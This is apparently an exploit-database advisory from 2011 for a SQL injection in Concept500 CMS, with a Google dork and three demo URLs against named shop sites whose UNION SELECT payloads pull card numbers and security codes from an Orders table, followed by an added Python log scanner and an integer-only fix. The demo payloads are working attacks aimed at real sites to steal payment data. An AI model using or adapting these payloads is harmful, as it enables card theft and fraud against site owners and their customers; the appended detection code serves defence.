# Exploit Title: Concept500 CMS SQL Injection Vulnerability
# Google Dork: [inurl : inurl:viewItem.php?id= ]
# Date: 2011-07-08
# Author: Sepehr Security Team
# Discovered By: H3X
# Software Site: http://www.concept500.co.uk/
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Expl0it :]
http://www.[sitename].com/viewitem.php?id=[SQL Injection]
[DEMO:]
1) http://www.mycommissionbid.com/bid/viewitem.php?id=-487+union+select+1,group_concat%28SecurityNo,0x3a,CardNo%29,3,4,5,6,7,8,9,10,11+from+Orders--
2) http://www.historicflyingclothing.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
3) http://www.hiscoll.com/viewitem.php?id=-10055+union+select+1,group_concat%28CardNo,0x3a,SecurityNo%29,3,4,5+from+Orders--
and more ...
[Note :]
This vulnerability gives direct access to payment information stored in the database, such as PayPal and other card information.
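[Detection example :]
A log check for the request pattern shown above, added here as an example and not part of the original advisory: it scans web access logs for viewitem.php requests whose id parameter is not a plain integer. The log lines, client addresses, table and column names in the sample, and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); hosts and IPs are placeholders.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Jul/2011:10:01:02 +0000] "GET /viewitem.php?id=487 HTTP/1.1" 200 5120
198.51.100.9 - - [08/Jul/2011:10:01:09 +0000] "GET /bid/viewItem.php?id=-487+union+select+1,group_concat%28a,0x3a,b%29,3+from+t-- HTTP/1.1" 200 7301
198.51.100.9 - - [08/Jul/2011:10:01:15 +0000] "GET /viewitem.php?id=10055%27 HTTP/1.1" 500 312
203.0.113.4 - - [08/Jul/2011:10:02:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SQL_HINT = re.compile(r"\b(union|select|group_concat|information_schema|from)\b", re.I)


def classify_id(value):
    """Return None for a legitimate item id, otherwise a reason string."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if SQL_HINT.search(value):
        return "sql-keywords"
    return "non-numeric"


def scan(log_text):
    """Return (client, reason, http_status) for each suspicious viewitem.php hit."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        # The advisory shows both viewItem.php and viewitem.php, so compare lowercased.
        if not url.path.lower().endswith("/viewitem.php"):
            continue
        # parse_qs decodes %xx escapes and turns '+' into spaces before we inspect the value.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            reason = classify_id(value)
            if reason:
                findings.append((client, reason, int(status)))
    return findings


if __name__ == "__main__":
    for client, reason, status in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\tHTTP {status}")
```

A hit that was answered with HTTP 200 deserves priority in triage, since the page may have rendered query results. The same integer-only rule on id, enforced in the application before the value reaches the SQL statement, closes the hole.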
~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+
[Spc. Thanks :]
thE_Knight | Einstein | W!z4rd | Naboodgar | CONS7ANTINE | Mr.Amir-Masoud| nImaarek | GrEEn-ErRor | Net.Plus | Cruel
All Sepehr Security Team Members And All Iranian Hack3rs
[Home Page :]
wWw.Sepehr-Team.orG